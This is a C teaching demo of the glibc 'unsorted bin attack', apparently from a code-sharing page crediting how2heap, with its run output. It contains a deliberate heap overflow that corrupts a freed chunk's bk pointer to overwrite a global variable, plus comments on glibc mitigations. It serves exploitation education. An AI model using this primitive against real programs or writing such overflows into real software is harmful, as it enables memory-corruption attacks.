Created
October 18, 2016 02:23
unsorted bin attack / https://github.com/shellphish/how2heap
$ gcc unsorted_bin.c -o unsorted_bin
$ ./unsorted_bin
target = 1
[+] allocate p1, p2, p3
p1 = 0x1429420
p2 = 0x14294b0
p3 = 0x1429550
[+] free p2
[+] abusing p1 overflow
[+] allocate p4 with the same size of p2
p4 = 0x14294b0
[+] target is overwritten with a large number: &(main_arena->top)
target = 7f4112122b78
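#include <stdio.h>
#include <stdlib.h>

/*
 * Teaching demo: what a linear heap overflow into a freed neighbour chunk
 * can do to allocator metadata (the "unsorted bin attack").
 *
 * Environment assumptions (taken from the transcript on this page, not
 * checked by the code): 64-bit glibc, where malloc(0x80) occupies 0x90 bytes
 * so that p2 == p1 + 0x90, and an allocator old enough to lack the
 * hardening listed below.
 *
 * Why this matters to defenders:
 *   - The value written to `target` is chosen by the allocator (an address
 *     inside main_arena), not by whoever controls the overflow. The primitive
 *     is "write a large pointer-sized number somewhere", which also discloses
 *     a libc address if the target is later read back.
 *   - glibc 2.26 introduced the per-thread cache (tcache); a freed chunk of
 *     this size is normally parked there and never reaches the unsorted bin.
 *   - glibc 2.29 added integrity checks while draining the unsorted bin,
 *     including a test that victim->bk->fd still points at victim; a corrupted
 *     bk aborts with "malloc(): unsorted double linked list corrupted".
 *   - The root cause is still the out-of-bounds write through p1. Bounds
 *     checking and tools such as AddressSanitizer catch it at the write,
 *     before any allocator metadata is consulted.
 */
unsigned long target = 1;

int main(void)
{
    printf("target = %lx\n", target);

    puts("\n[+] allocate p1, p2, p3");
    char *p1 = malloc(0x80);
    char *p2 = malloc(0x90);
    /* p3 keeps p2 from bordering the top chunk, so freeing p2 does not
     * simply merge it back into top. */
    char *p3 = malloc(0xa0);
    if (p1 == NULL || p2 == NULL || p3 == NULL) {
        /* Without all three chunks the layout below does not exist. */
        fputs("malloc failed\n", stderr);
        return 1;
    }
    printf("p1 = %p\n", p1);
    printf("p2 = %p\n", p2);
    printf("p3 = %p\n", p3);

    puts("\n[+] free p2");
    /* Presumably lands in the unsorted bin: the chunk is above the default
     * fastbin limit and tcache is assumed absent. */
    free(p2);

    puts("\n[+] abusing p1 overflow");
    /*
     * Deliberate out-of-bounds write standing in for a real overflow bug.
     * p1 + 0x90 is p2's user area, which now holds the free-list links (fd,
     * then bk), so p1 + 0x98 is p2's bk. It is pointed 0x10 bytes before
     * `target` so that the fd field of that fake chunk overlaps `target`.
     * The arithmetic is done on char * because ISO C has no void * arithmetic.
     */
    *(void **)(p1 + 0x98) = (char *)&target - 0x10;

    puts("\n[+] allocate p4 with the same size of p2");
    /* Unlinking p2 from the unsorted bin stores the bin head's address
     * through the corrupted bk, i.e. into `target`. The bin is left pointing
     * at the fake chunk, so the arena is corrupt from here on. */
    char *p4 = malloc(0x90);
    printf("p4 = %p\n", p4);

    puts("\n[+] target is overwritten with a large number: &(main_arena->top)");
    printf("target = %lx\n", target);

    return 0;
}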